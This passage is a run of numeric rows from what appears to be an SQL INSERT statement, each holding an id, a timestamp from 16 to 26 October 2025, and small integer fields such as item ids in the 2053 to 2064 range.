(20995, '2025-10-16 22:41:03', 1, 2062, 0, 1, 1),
(20996, '2025-10-16 22:41:12', 1, 2063, 0, 1, 1),
(20997, '2025-10-16 23:14:35', 1, 2055, 0, 1, 1),
(20998, '2025-10-16 23:45:53', 1, 2060, 0, 1, 1),
(20999, '2025-10-17 00:11:46', 1, 2058, 0, 1, 1),
(21000, '2025-10-17 01:36:19', 1, 2059, 0, 1, 1),
(21001, '2025-10-17 01:41:51', 1, 2053, 0, 1, 1),
(21002, '2025-10-17 01:56:22', 1, 2058, 0, 1, 1),
(21003, '2025-10-17 02:56:49', 1, 2064, 0, 1, 1),
(21004, '2025-10-17 05:02:37', 1, 2060, 0, 1, 1),
(21005, '2025-10-17 05:39:06', 1, 2063, 0, 1, 1),
(21006, '2025-10-17 06:03:50', 1, 2064, 0, 1, 1),
(21007, '2025-10-17 06:04:28', 1, 2064, 0, 1, 1),
(21008, '2025-10-17 06:05:23', 1, 2061, 0, 1, 1),
(21009, '2025-10-17 06:29:07', 1, 2060, 0, 1, 1),
(21010, '2025-10-17 06:41:09', 1, 2058, 0, 1, 1),
(21011, '2025-10-17 07:50:52', 1, 2063, 0, 1, 1),
(21012, '2025-10-17 08:07:20', 1, 2060, 0, 1, 1),
(21013, '2025-10-17 08:51:44', 1, 2058, 0, 1, 1),
(21014, '2025-10-17 10:46:27', 1, 2063, 0, 1, 1),
(21015, '2025-10-17 11:09:03', 1, 2055, 0, 1, 1),
(21016, '2025-10-17 11:24:08', 1, 2064, 0, 1, 1),
(21017, '2025-10-17 11:33:44', 1, 2064, 0, 1, 1),
(21018, '2025-10-17 12:30:43', 1, 2059, 0, 1, 1),
(21019, '2025-10-17 15:03:33', 1, 2054, 0, 1, 1),
(21020, '2025-10-17 15:07:02', 1, 2061, 0, 1, 1),
(21021, '2025-10-17 15:15:10', 1, 2060, 0, 1, 1),
(21022, '2025-10-17 15:59:49', 1, 2064, 0, 1, 1),
(21023, '2025-10-17 16:23:56', 1, 2059, 0, 1, 1),
(21024, '2025-10-17 16:24:14', 1, 2064, 0, 1, 1),
(21025, '2025-10-17 16:30:02', 1, 2062, 0, 1, 1),
(21026, '2025-10-17 16:32:27', 1, 2059, 0, 1, 1),
(21027, '2025-10-17 17:03:05', 1, 2062, 0, 1, 1),
(21028, '2025-10-17 17:08:41', 1, 2064, 0, 1, 1),
(21029, '2025-10-17 18:17:14', 1, 2064, 0, 1, 1),
(21030, '2025-10-17 19:28:16', 1, 2062, 0, 1, 1),
(21031, '2025-10-17 19:53:38', 1, 2064, 0, 1, 1),
(21032, '2025-10-17 22:28:32', 1, 2062, 0, 1, 1),
(21033, '2025-10-18 01:00:31', 1, 2060, 0, 1, 1),
(21034, '2025-10-18 04:07:31', 1, 2064, 0, 1, 1),
(21035, '2025-10-18 04:14:23', 1, 2064, 0, 1, 1),
(21036, '2025-10-18 04:38:21', 1, 2064, 0, 1, 1),
(21037, '2025-10-18 05:19:52', 1, 2059, 0, 1, 1),
(21038, '2025-10-18 05:44:01', 1, 2060, 0, 1, 1),
(21039, '2025-10-18 08:40:25', 1, 2060, 0, 1, 1),
(21040, '2025-10-18 11:06:42', 1, 2058, 0, 1, 1),
(21041, '2025-10-18 11:29:32', 1, 2055, 0, 1, 1),
(21042, '2025-10-18 11:49:36', 1, 2061, 0, 1, 1),
(21043, '2025-10-18 12:36:19', 1, 2055, 0, 1, 1),
(21044, '2025-10-18 12:58:21', 1, 2060, 0, 1, 1),
(21045, '2025-10-18 13:05:54', 1, 2064, 0, 1, 1),
(21046, '2025-10-18 13:07:56', 1, 2063, 0, 1, 1),
(21047, '2025-10-18 14:25:47', 1, 2064, 0, 1, 1),
(21048, '2025-10-18 15:31:32', 1, 2054, 0, 1, 1),
(21049, '2025-10-18 15:50:43', 1, 2060, 0, 1, 1),
(21050, '2025-10-18 16:06:23', 1, 2061, 0, 1, 1),
(21051, '2025-10-18 16:33:52', 1, 2064, 0, 1, 1),
(21052, '2025-10-18 16:37:05', 1, 2064, 0, 1, 1),
(21053, '2025-10-18 17:30:07', 1, 2062, 0, 1, 1),
(21054, '2025-10-18 17:45:04', 1, 2059, 0, 1, 1),
(21055, '2025-10-18 17:55:54', 1, 2060, 0, 1, 1),
(21056, '2025-10-18 18:52:08', 1, 2064, 0, 1, 1),
(21057, '2025-10-18 19:48:50', 1, 2059, 0, 1, 1),
(21058, '2025-10-18 20:12:03', 1, 2062, 0, 1, 1),
(21059, '2025-10-18 20:12:30', 1, 2064, 0, 1, 1),
(21060, '2025-10-18 20:12:47', 1, 2055, 0, 1, 1),
(21061, '2025-10-18 20:13:27', 1, 2064, 0, 1, 1),
(21062, '2025-10-18 21:02:40', 1, 2063, 0, 1, 1),
(21063, '2025-10-18 21:03:25', 1, 2063, 0, 1, 1),
(21064, '2025-10-18 21:07:05', 1, 2064, 0, 1, 1),
(21065, '2025-10-18 21:07:51', 1, 2064, 0, 1, 1),
(21066, '2025-10-18 21:08:20', 1, 2064, 0, 1, 1),
(21067, '2025-10-18 21:09:57', 1, 2061, 0, 1, 1),
(21068, '2025-10-18 21:11:38', 1, 2059, 0, 1, 1),
(21069, '2025-10-18 21:13:43', 1, 2058, 0, 1, 1),
(21070, '2025-10-18 21:17:22', 1, 2054, 0, 1, 1),
(21071, '2025-10-18 21:19:48', 1, 2060, 0, 1, 1),
(21072, '2025-10-18 21:20:35', 1, 2060, 0, 1, 1),
(21073, '2025-10-18 22:26:15', 1, 2064, 0, 1, 1),
(21074, '2025-10-18 23:18:30', 1, 2064, 0, 1, 1),
(21075, '2025-10-19 02:22:46', 1, 2060, 0, 1, 1),
(21076, '2025-10-19 03:47:40', 1, 2060, 0, 1, 1),
(21077, '2025-10-19 04:32:52', 1, 2058, 0, 1, 1),
(21078, '2025-10-19 05:00:13', 1, 2064, 0, 1, 1),
(21079, '2025-10-19 05:30:47', 1, 2059, 0, 1, 1),
(21080, '2025-10-19 05:48:13', 1, 2059, 0, 1, 1),
(21081, '2025-10-19 06:31:50', 1, 2063, 0, 1, 1),
(21082, '2025-10-19 06:50:58', 1, 2060, 0, 1, 1),
(21083, '2025-10-19 06:51:02', 1, 2059, 0, 1, 1),
(21084, '2025-10-19 07:07:44', 1, 2064, 0, 1, 1),
(21085, '2025-10-19 07:09:14', 1, 2055, 0, 1, 1),
(21086, '2025-10-19 08:04:08', 1, 2064, 0, 1, 1),
(21087, '2025-10-19 08:43:33', 1, 2058, 0, 1, 1),
(21088, '2025-10-19 08:52:28', 1, 2054, 0, 1, 1),
(21089, '2025-10-19 09:05:00', 1, 2054, 0, 1, 1),
(21090, '2025-10-19 09:52:33', 1, 2061, 0, 1, 1),
(21091, '2025-10-19 11:28:37', 1, 2059, 0, 1, 1),
(21092, '2025-10-19 11:42:41', 1, 2055, 0, 1, 1),
(21093, '2025-10-19 11:45:06', 1, 2062, 0, 1, 1),
(21094, '2025-10-19 12:00:41', 1, 2064, 0, 1, 1),
(21095, '2025-10-19 14:12:25', 1, 2064, 0, 1, 1),
(21096, '2025-10-19 14:20:45', 1, 2060, 0, 1, 1),
(21097, '2025-10-19 14:32:30', 1, 2064, 0, 1, 1),
(21098, '2025-10-19 18:53:05', 1, 2061, 0, 1, 1),
(21099, '2025-10-19 19:19:53', 1, 2064, 0, 1, 1),
(21100, '2025-10-19 19:26:26', 1, 2055, 0, 1, 1),
(21101, '2025-10-19 19:44:51', 1, 2064, 0, 1, 1),
(21102, '2025-10-19 21:50:25', 1, 2054, 0, 1, 1),
(21103, '2025-10-19 22:16:27', 1, 2058, 0, 1, 1),
(21104, '2025-10-19 23:37:35', 1, 2055, 0, 1, 1),
(21105, '2025-10-20 00:50:54', 1, 2062, 0, 1, 1),
(21106, '2025-10-20 01:26:51', 1, 2064, 0, 1, 1),
(21107, '2025-10-20 02:00:43', 1, 2060, 0, 1, 1),
(21108, '2025-10-20 03:17:22', 1, 2062, 0, 1, 1),
(21109, '2025-10-20 03:41:21', 1, 2064, 0, 1, 1),
(21110, '2025-10-20 03:44:58', 1, 2064, 0, 1, 1),
(21111, '2025-10-20 04:59:59', 1, 2060, 0, 1, 1),
(21112, '2025-10-20 05:40:09', 1, 2064, 0, 1, 1),
(21113, '2025-10-20 06:06:23', 1, 2063, 0, 1, 1),
(21114, '2025-10-20 06:43:32', 1, 2060, 0, 1, 1),
(21115, '2025-10-20 07:04:57', 1, 2060, 0, 1, 1),
(21116, '2025-10-20 09:25:43', 1, 2058, 0, 1, 1),
(21117, '2025-10-20 09:53:26', 1, 2064, 0, 1, 1),
(21118, '2025-10-20 09:53:26', 1, 2064, 0, 1, 1),
(21119, '2025-10-20 09:53:33', 1, 2064, 0, 1, 1),
(21120, '2025-10-20 09:53:33', 1, 2064, 0, 1, 1),
(21121, '2025-10-20 09:53:35', 1, 2058, 0, 1, 1),
(21122, '2025-10-20 09:53:36', 1, 2055, 0, 1, 1),
(21123, '2025-10-20 09:53:36', 1, 2064, 0, 1, 1),
(21124, '2025-10-20 09:53:37', 1, 2064, 0, 1, 1),
(21125, '2025-10-20 09:53:38', 1, 2061, 0, 1, 1),
(21126, '2025-10-20 09:53:40', 1, 2061, 0, 1, 1),
(21127, '2025-10-20 09:53:40', 1, 2059, 0, 1, 1),
(21128, '2025-10-20 09:53:42', 1, 2064, 0, 1, 1),
(21129, '2025-10-20 09:53:42', 1, 2062, 0, 1, 1),
(21130, '2025-10-20 09:53:42', 1, 2060, 0, 1, 1),
(21131, '2025-10-20 09:53:43', 1, 2055, 0, 1, 1),
(21132, '2025-10-20 09:53:43', 1, 2058, 0, 1, 1),
(21133, '2025-10-20 09:53:43', 1, 2063, 0, 1, 1),
(21134, '2025-10-20 09:53:45', 1, 2063, 0, 1, 1),
(21135, '2025-10-20 09:53:45', 1, 2062, 0, 1, 1),
(21136, '2025-10-20 09:53:46', 1, 2064, 0, 1, 1),
(21137, '2025-10-20 09:53:48', 1, 2058, 0, 1, 1),
(21138, '2025-10-20 09:53:48', 1, 2061, 0, 1, 1),
(21139, '2025-10-20 09:53:50', 1, 2064, 0, 1, 1),
(21140, '2025-10-20 09:53:50', 1, 2061, 0, 1, 1),
(21141, '2025-10-20 09:53:51', 1, 2064, 0, 1, 1),
(21142, '2025-10-20 09:53:52', 1, 2055, 0, 1, 1),
(21143, '2025-10-20 09:53:52', 1, 2060, 0, 1, 1),
(21144, '2025-10-20 09:53:53', 1, 2055, 0, 1, 1),
(21145, '2025-10-20 09:53:53', 1, 2062, 0, 1, 1),
(21146, '2025-10-20 09:53:53', 1, 2059, 0, 1, 1),
(21147, '2025-10-20 09:53:54', 1, 2058, 0, 1, 1),
(21148, '2025-10-20 09:53:54', 1, 2063, 0, 1, 1),
(21149, '2025-10-20 09:53:56', 1, 2063, 0, 1, 1),
(21150, '2025-10-20 09:53:56', 1, 2062, 0, 1, 1),
(21151, '2025-10-20 09:53:57', 1, 2061, 0, 1, 1),
(21152, '2025-10-20 09:53:57', 1, 2064, 0, 1, 1),
(21153, '2025-10-20 09:53:58', 1, 2064, 0, 1, 1),
(21154, '2025-10-20 09:53:58', 1, 2064, 0, 1, 1),
(21155, '2025-10-20 09:54:00', 1, 2060, 0, 1, 1),
(21156, '2025-10-20 09:54:00', 1, 2055, 0, 1, 1),
(21157, '2025-10-20 09:54:00', 1, 2058, 0, 1, 1),
(21158, '2025-10-20 09:54:00', 1, 2062, 0, 1, 1),
(21159, '2025-10-20 09:54:00', 1, 2063, 0, 1, 1),
(21160, '2025-10-20 09:54:00', 1, 2059, 0, 1, 1),
(21161, '2025-10-20 09:54:02', 1, 2062, 0, 1, 1),
(21162, '2025-10-20 09:54:02', 1, 2063, 0, 1, 1),
(21163, '2025-10-20 09:54:02', 1, 2053, 0, 1, 1),
(21164, '2025-10-20 09:54:03', 1, 2054, 0, 1, 1),
(21165, '2025-10-20 09:54:03', 1, 2053, 0, 1, 1),
(21166, '2025-10-20 09:54:03', 1, 2053, 0, 1, 1),
(21167, '2025-10-20 09:54:04', 1, 2064, 0, 1, 1),
(21168, '2025-10-20 09:54:05', 1, 2064, 0, 1, 1),
(21169, '2025-10-20 09:54:05', 1, 2064, 0, 1, 1),
(21170, '2025-10-20 09:54:05', 1, 2060, 0, 1, 1),
(21171, '2025-10-20 09:54:05', 1, 2064, 0, 1, 1),
(21172, '2025-10-20 09:54:06', 1, 2053, 0, 1, 1),
(21173, '2025-10-20 09:54:06', 1, 2064, 0, 1, 1),
(21174, '2025-10-20 09:54:07', 1, 2054, 0, 1, 1),
(21175, '2025-10-20 09:54:07', 1, 2064, 0, 1, 1),
(21176, '2025-10-20 09:54:07', 1, 2064, 0, 1, 1),
(21177, '2025-10-20 09:54:07', 1, 2053, 0, 1, 1),
(21178, '2025-10-20 09:54:07', 1, 2064, 0, 1, 1),
(21179, '2025-10-20 09:54:08', 1, 2060, 0, 1, 1),
(21180, '2025-10-20 09:54:10', 1, 2064, 0, 1, 1),
(21181, '2025-10-20 09:54:10', 1, 2053, 0, 1, 1),
(21182, '2025-10-20 09:54:13', 1, 2053, 0, 1, 1),
(21183, '2025-10-20 09:54:13', 1, 2054, 0, 1, 1),
(21184, '2025-10-20 09:54:14', 1, 2064, 0, 1, 1),
(21185, '2025-10-20 09:54:15', 1, 2064, 0, 1, 1),
(21186, '2025-10-20 09:54:19', 1, 2064, 0, 1, 1),
(21187, '2025-10-20 10:10:51', 1, 2062, 0, 1, 1),
(21188, '2025-10-20 11:14:04', 1, 2063, 0, 1, 1),
(21189, '2025-10-20 11:15:16', 1, 2055, 0, 1, 1),
(21190, '2025-10-20 11:22:24', 1, 2064, 0, 1, 1),
(21191, '2025-10-20 12:05:16', 1, 2060, 0, 1, 1),
(21192, '2025-10-20 12:33:08', 1, 2062, 0, 1, 1),
(21193, '2025-10-20 12:37:58', 1, 2054, 0, 1, 1),
(21194, '2025-10-20 13:50:21', 1, 2062, 0, 1, 1),
(21195, '2025-10-20 13:50:49', 1, 2064, 0, 1, 1),
(21196, '2025-10-20 13:52:24', 1, 2053, 0, 1, 1),
(21197, '2025-10-20 13:53:33', 1, 2064, 0, 1, 1),
(21198, '2025-10-20 13:54:26', 1, 2061, 0, 1, 1),
(21199, '2025-10-20 13:56:04', 1, 2058, 0, 1, 1),
(21200, '2025-10-20 13:59:10', 1, 2054, 0, 1, 1),
(21201, '2025-10-20 14:10:41', 1, 2060, 0, 1, 1),
(21202, '2025-10-20 14:25:28', 1, 2054, 0, 1, 1),
(21203, '2025-10-20 15:01:39', 1, 2061, 0, 1, 1),
(21204, '2025-10-20 15:35:33', 1, 2064, 0, 1, 1),
(21205, '2025-10-20 15:43:00', 1, 2064, 0, 1, 1),
(21206, '2025-10-20 16:28:50', 1, 2062, 0, 1, 1),
(21207, '2025-10-20 16:46:41', 1, 2059, 0, 1, 1),
(21208, '2025-10-20 17:25:57', 1, 2053, 0, 1, 1),
(21209, '2025-10-20 17:26:29', 1, 2063, 0, 1, 1),
(21210, '2025-10-20 18:58:29', 1, 2061, 0, 1, 1),
(21211, '2025-10-20 20:05:15', 1, 2064, 0, 1, 1),
(21212, '2025-10-20 20:32:45', 1, 2058, 0, 1, 1),
(21213, '2025-10-20 20:34:45', 1, 2054, 0, 1, 1),
(21214, '2025-10-20 20:45:22', 1, 2061, 0, 1, 1),
(21215, '2025-10-20 20:49:45', 1, 2058, 0, 1, 1),
(21216, '2025-10-20 22:09:19', 1, 2062, 0, 1, 1),
(21217, '2025-10-20 23:32:44', 1, 2062, 0, 1, 1),
(21218, '2025-10-21 00:10:19', 1, 2064, 3855, 1, 1),
(21219, '2025-10-21 00:10:22', 1, 2064, 3855, 1, 1),
(21220, '2025-10-21 01:37:48', 1, 2064, 0, 1, 1),
(21221, '2025-10-21 01:40:52', 1, 2054, 0, 1, 1),
(21222, '2025-10-21 02:09:03', 1, 2061, 0, 1, 1),
(21223, '2025-10-21 02:26:03', 1, 2064, 0, 1, 1),
(21224, '2025-10-21 02:39:45', 1, 2060, 0, 1, 1),
(21225, '2025-10-21 03:24:05', 1, 2054, 0, 1, 1),
(21226, '2025-10-21 04:57:22', 1, 2060, 0, 1, 1),
(21227, '2025-10-21 05:28:34', 1, 2064, 0, 1, 1),
(21228, '2025-10-21 05:35:01', 1, 2063, 0, 1, 1),
(21229, '2025-10-21 05:55:36', 1, 2060, 0, 1, 1),
(21230, '2025-10-21 06:12:21', 1, 2060, 0, 1, 1),
(21231, '2025-10-21 06:17:42', 1, 2061, 0, 1, 1),
(21232, '2025-10-21 06:28:38', 1, 2062, 0, 1, 1),
(21233, '2025-10-21 07:18:42', 1, 2061, 0, 1, 1),
(21234, '2025-10-21 08:09:41', 1, 2064, 0, 1, 1),
(21235, '2025-10-21 08:13:28', 1, 2058, 0, 1, 1),
(21236, '2025-10-21 08:58:06', 1, 2055, 0, 1, 1),
(21237, '2025-10-21 09:39:07', 1, 2055, 0, 1, 1),
(21238, '2025-10-21 09:58:21', 1, 2063, 0, 1, 1),
(21239, '2025-10-21 12:03:04', 1, 2055, 0, 1, 1),
(21240, '2025-10-21 12:12:20', 1, 2054, 0, 1, 1),
(21241, '2025-10-21 13:16:51', 1, 2061, 0, 1, 1),
(21242, '2025-10-21 14:06:22', 1, 2054, 0, 1, 1),
(21243, '2025-10-21 14:38:25', 1, 2062, 0, 1, 1),
(21244, '2025-10-21 14:53:13', 1, 2059, 0, 1, 1),
(21245, '2025-10-21 15:42:37', 1, 2054, 0, 1, 1),
(21246, '2025-10-21 16:28:37', 1, 2062, 0, 1, 1),
(21247, '2025-10-21 16:28:37', 1, 2060, 0, 1, 1),
(21248, '2025-10-21 16:28:37', 1, 2055, 0, 1, 1),
(21249, '2025-10-21 16:28:37', 1, 2064, 0, 1, 1),
(21250, '2025-10-21 16:28:37', 1, 2061, 0, 1, 1),
(21251, '2025-10-21 16:28:37', 1, 2054, 0, 1, 1),
(21252, '2025-10-21 16:28:37', 1, 2059, 0, 1, 1),
(21253, '2025-10-21 16:28:37', 1, 2063, 0, 1, 1),
(21254, '2025-10-21 16:28:37', 1, 2058, 0, 1, 1),
(21255, '2025-10-21 17:38:15', 1, 2064, 0, 1, 1),
(21256, '2025-10-21 17:46:17', 1, 2064, 0, 1, 1),
(21257, '2025-10-21 17:56:36', 1, 2059, 0, 1, 1),
(21258, '2025-10-21 18:09:05', 1, 2058, 0, 1, 1),
(21259, '2025-10-21 18:41:43', 1, 2064, 0, 1, 1),
(21260, '2025-10-21 18:48:47', 1, 2064, 0, 1, 1),
(21261, '2025-10-21 18:49:02', 1, 2060, 0, 1, 1),
(21262, '2025-10-21 21:30:45', 1, 2060, 0, 1, 1),
(21263, '2025-10-22 00:02:40', 1, 2058, 0, 1, 1),
(21264, '2025-10-22 01:15:08', 1, 2063, 0, 1, 1),
(21265, '2025-10-22 01:59:40', 1, 2055, 0, 1, 1),
(21266, '2025-10-22 02:00:21', 1, 2060, 0, 1, 1),
(21267, '2025-10-22 02:34:32', 1, 2064, 0, 1, 1),
(21268, '2025-10-22 02:55:49', 1, 2054, 0, 1, 1),
(21269, '2025-10-22 04:54:10', 1, 2061, 0, 1, 1),
(21270, '2025-10-22 05:09:57', 1, 2058, 0, 1, 1),
(21271, '2025-10-22 05:10:12', 1, 2054, 0, 1, 1),
(21272, '2025-10-22 06:22:07', 1, 2061, 0, 1, 1),
(21273, '2025-10-22 06:23:22', 1, 2059, 0, 1, 1),
(21274, '2025-10-22 06:56:05', 1, 2062, 0, 1, 1),
(21275, '2025-10-22 08:26:56', 1, 2064, 0, 1, 1),
(21276, '2025-10-22 09:53:22', 1, 2054, 0, 1, 1),
(21277, '2025-10-22 11:22:53', 1, 2060, 0, 1, 1),
(21278, '2025-10-22 11:54:39', 1, 2058, 0, 1, 1),
(21279, '2025-10-22 12:29:14', 1, 2054, 0, 1, 1),
(21280, '2025-10-22 13:33:11', 1, 2064, 0, 1, 1),
(21281, '2025-10-22 13:41:01', 1, 2054, 0, 1, 1),
(21282, '2025-10-22 13:50:29', 1, 2060, 0, 1, 1),
(21283, '2025-10-22 15:05:42', 1, 2062, 0, 1, 1),
(21284, '2025-10-22 15:42:12', 1, 2060, 0, 1, 1),
(21285, '2025-10-22 15:42:40', 1, 2064, 0, 1, 1),
(21286, '2025-10-22 17:37:52', 1, 2064, 0, 1, 1),
(21287, '2025-10-22 21:07:46', 1, 2060, 0, 1, 1),
(21288, '2025-10-22 21:32:56', 1, 2054, 0, 1, 1),
(21289, '2025-10-22 21:52:14', 1, 2060, 0, 1, 1),
(21290, '2025-10-22 23:28:16', 1, 2058, 0, 1, 1),
(21291, '2025-10-23 00:17:26', 1, 2060, 0, 1, 1),
(21292, '2025-10-23 00:18:01', 1, 2064, 0, 1, 1),
(21293, '2025-10-23 00:54:20', 1, 2063, 0, 1, 1),
(21294, '2025-10-23 01:31:07', 1, 2062, 0, 1, 1),
(21295, '2025-10-23 01:34:24', 1, 2054, 0, 1, 1),
(21296, '2025-10-23 01:49:42', 1, 2063, 0, 1, 1),
(21297, '2025-10-23 01:56:33', 1, 2055, 0, 1, 1),
(21298, '2025-10-23 02:37:56', 1, 2053, 0, 1, 1),
(21299, '2025-10-23 02:52:27', 1, 2059, 0, 1, 1),
(21300, '2025-10-23 04:01:12', 1, 2061, 0, 1, 1),
(21301, '2025-10-23 04:23:36', 1, 2062, 0, 1, 1),
(21302, '2025-10-23 04:53:26', 1, 2061, 0, 1, 1),
(21303, '2025-10-23 05:08:08', 1, 2054, 0, 1, 1),
(21304, '2025-10-23 05:17:18', 1, 2058, 0, 1, 1),
(21305, '2025-10-23 05:28:31', 1, 2060, 0, 1, 1),
(21306, '2025-10-23 05:40:28', 1, 2064, 0, 1, 1),
(21307, '2025-10-23 06:27:22', 1, 2062, 0, 1, 1),
(21308, '2025-10-23 06:45:16', 1, 2059, 0, 1, 1),
(21309, '2025-10-23 08:12:33', 1, 2064, 0, 1, 1),
(21310, '2025-10-23 08:46:24', 1, 2054, 0, 1, 1),
(21311, '2025-10-23 14:22:54', 1, 2064, 0, 1, 1),
(21312, '2025-10-23 14:38:13', 1, 2054, 0, 1, 1),
(21313, '2025-10-23 15:28:04', 1, 2060, 0, 1, 1),
(21314, '2025-10-23 17:38:26', 1, 2064, 0, 1, 1),
(21315, '2025-10-23 17:47:42', 1, 2059, 0, 1, 1),
(21316, '2025-10-23 17:52:12', 1, 2064, 0, 1, 1),
(21317, '2025-10-23 22:34:37', 1, 2060, 0, 1, 1),
(21318, '2025-10-23 22:43:24', 1, 2062, 0, 1, 1),
(21319, '2025-10-23 22:43:33', 1, 2063, 0, 1, 1),
(21320, '2025-10-23 22:43:36', 1, 2061, 0, 1, 1),
(21321, '2025-10-24 00:02:02', 1, 2058, 0, 1, 1),
(21322, '2025-10-24 00:19:39', 1, 2064, 0, 1, 1),
(21323, '2025-10-24 01:40:32', 1, 2055, 0, 1, 1),
(21324, '2025-10-24 01:59:23', 1, 2063, 0, 1, 1),
(21325, '2025-10-24 04:29:13', 1, 2060, 0, 1, 1),
(21326, '2025-10-24 04:54:00', 1, 2061, 0, 1, 1),
(21327, '2025-10-24 05:05:36', 1, 2054, 0, 1, 1),
(21328, '2025-10-24 05:10:27', 1, 2060, 0, 1, 1),
(21329, '2025-10-24 05:20:06', 1, 2054, 0, 1, 1),
(21330, '2025-10-24 06:28:32', 1, 2062, 0, 1, 1),
(21331, '2025-10-24 06:48:51', 1, 2059, 0, 1, 1),
(21332, '2025-10-24 08:18:02', 1, 2058, 0, 1, 1),
(21333, '2025-10-24 08:18:44', 1, 2053, 0, 1, 1),
(21334, '2025-10-24 09:18:09', 1, 2064, 0, 1, 1),
(21335, '2025-10-24 11:32:01', 1, 2060, 0, 1, 1),
(21336, '2025-10-24 11:57:59', 1, 2054, 0, 1, 1),
(21337, '2025-10-24 13:03:24', 1, 2060, 0, 1, 1),
(21338, '2025-10-24 13:07:04', 1, 2064, 0, 1, 1),
(21339, '2025-10-24 17:16:59', 1, 2064, 0, 1, 1),
(21340, '2025-10-24 17:31:46', 1, 2060, 0, 1, 1),
(21341, '2025-10-24 17:40:03', 1, 2064, 0, 1, 1),
(21342, '2025-10-24 17:58:19', 1, 2063, 0, 1, 1),
(21343, '2025-10-24 21:53:43', 1, 2064, 0, 1, 1),
(21344, '2025-10-24 22:18:47', 1, 2060, 0, 1, 1),
(21345, '2025-10-24 23:30:05', 1, 2060, 0, 1, 1),
(21346, '2025-10-25 00:03:00', 1, 2058, 0, 1, 1),
(21347, '2025-10-25 01:28:31', 1, 2054, 0, 1, 1),
(21348, '2025-10-25 01:35:44', 1, 2055, 0, 1, 1),
(21349, '2025-10-25 02:04:56', 1, 2063, 0, 1, 1),
(21350, '2025-10-25 02:27:08', 1, 2060, 0, 1, 1),
(21351, '2025-10-25 02:27:10', 1, 2064, 0, 1, 1),
(21352, '2025-10-25 04:27:49', 1, 2058, 0, 1, 1),
(21353, '2025-10-25 04:50:18', 1, 2064, 0, 1, 1),
(21354, '2025-10-25 04:50:52', 1, 2061, 0, 1, 1),
(21355, '2025-10-25 05:07:32', 1, 2054, 0, 1, 1),
(21356, '2025-10-25 06:28:42', 1, 2062, 0, 1, 1),
(21357, '2025-10-25 06:30:51', 1, 2054, 0, 1, 1),
(21358, '2025-10-25 06:31:33', 1, 2064, 0, 1, 1),
(21359, '2025-10-25 06:46:20', 1, 2059, 0, 1, 1),
(21360, '2025-10-25 06:53:46', 1, 2060, 0, 1, 1),
(21361, '2025-10-25 07:19:08', 1, 2064, 0, 1, 1),
(21362, '2025-10-25 09:28:59', 1, 2060, 0, 1, 1),
(21363, '2025-10-25 12:25:22', 1, 2055, 0, 1, 1),
(21364, '2025-10-25 12:27:07', 1, 2063, 0, 1, 1),
(21365, '2025-10-25 12:28:25', 1, 2058, 0, 1, 1),
(21366, '2025-10-25 13:45:28', 1, 2064, 0, 1, 1),
(21367, '2025-10-25 14:20:38', 1, 2054, 0, 1, 1),
(21368, '2025-10-25 14:40:08', 1, 2061, 0, 1, 1),
(21369, '2025-10-25 14:40:15', 1, 2060, 0, 1, 1),
(21370, '2025-10-25 14:51:15', 1, 2062, 0, 1, 1),
(21371, '2025-10-25 15:07:37', 1, 2064, 0, 1, 1),
(21372, '2025-10-25 15:16:14', 1, 2059, 0, 1, 1),
(21373, '2025-10-25 15:22:24', 1, 2054, 0, 1, 1),
(21374, '2025-10-25 15:49:07', 1, 2064, 0, 1, 1),
(21375, '2025-10-25 17:38:12', 1, 2064, 0, 1, 1),
(21376, '2025-10-25 18:19:05', 1, 2063, 0, 1, 1),
(21377, '2025-10-25 18:24:47', 1, 2060, 0, 1, 1),
(21378, '2025-10-25 18:44:05', 1, 2060, 0, 1, 1),
(21379, '2025-10-25 19:30:55', 1, 2061, 0, 1, 1),
(21380, '2025-10-25 20:37:58', 1, 2061, 0, 1, 1),
(21381, '2025-10-25 21:31:51', 1, 2054, 0, 1, 1),
(21382, '2025-10-25 21:36:14', 1, 2062, 0, 1, 1),
(21383, '2025-10-25 21:40:00', 1, 2054, 0, 1, 1),
(21384, '2025-10-25 21:49:00', 1, 2064, 0, 1, 1),
(21385, '2025-10-25 22:12:06', 1, 2060, 0, 1, 1),
(21386, '2025-10-25 23:16:33', 1, 2059, 0, 1, 1),
(21387, '2025-10-26 00:00:56', 1, 2058, 0, 1, 1),
(21388, '2025-10-26 00:41:41', 1, 2058, 0, 1, 1),
(21389, '2025-10-26 01:33:19', 1, 2060, 0, 1, 1),
(21390, '2025-10-26 01:38:12', 1, 2055, 0, 1, 1),
(21391, '2025-10-26 01:59:30', 1, 2063, 0, 1, 1),
(21392, '2025-10-26 03:02:53', 1, 2059, 0, 1, 1),
(21393, '2025-10-26 04:10:25', 1, 2064, 0, 1, 1),
(21394, '2025-10-26 04:12:14', 1, 2059, 0, 1, 1),
(21395, '2025-10-26 04:25:04', 1, 2064, 0, 1, 1),
(21396, '2025-10-26 04:35:53', 1, 2063, 0, 1, 1),
(21397, '2025-10-26 04:50:18', 1, 2064, 0, 1, 1),
(21398, '2025-10-26 04:50:39', 1, 2061, 0, 1, 1),
(21399, '2025-10-26 04:54:07', 1, 2055, 0, 1, 1),
(21400, '2025-10-26 05:05:10', 1, 2054, 0, 1, 1),
(21401, '2025-10-26 05:06:27', 1, 2054, 0, 1, 1),
(21402, '2025-10-26 05:32:56', 1, 2064, 0, 1, 1),
(21403, '2025-10-26 06:29:37', 1, 2062, 0, 1, 1),
(21404, '2025-10-26 06:45:16', 1, 2059, 0, 1, 1),
(21405, '2025-10-26 07:07:56', 1, 2060, 0, 1, 1),
(21406, '2025-10-26 07:08:00', 1, 2059, 0, 1, 1),
(21407, '2025-10-26 07:47:05', 1, 2064, 3931, 1, 1),
(21408, '2025-10-26 08:31:20', 1, 2060, 0, 1, 1),
(21409, '2025-10-26 08:40:36', 1, 2063, 0, 1, 1),
(21410, '2025-10-26 08:46:36', 1, 2058, 0, 1, 1),
(21411, '2025-10-26 09:01:23', 1, 2060, 0, 1, 1),
(21412, '2025-10-26 09:03:54', 1, 2058, 0, 1, 1),
(21413, '2025-10-26 09:45:07', 1, 2055, 0, 1, 1),
(21414, '2025-10-26 09:54:01', 1, 2064, 0, 1, 1),
(21415, '2025-10-26 10:19:12', 1, 2054, 0, 1, 1),
(21416, '2025-10-26 10:58:50', 1, 2061, 0, 1, 1),
(21417, '2025-10-26 11:08:30', 1, 2059, 0, 1, 1),
(21418, '2025-10-26 11:21:26', 1, 2061, 0, 1, 1),
(21419, '2025-10-26 11:39:21', 1, 2062, 0, 1, 1),
(21420, '2025-10-26 12:47:49', 1, 2054, 0, 1, 1),
(21421, '2025-10-26 12:56:33', 1, 2064, 0, 1, 1),
(21422, '2025-10-26 13:02:54', 1, 2059, 0, 1, 1),
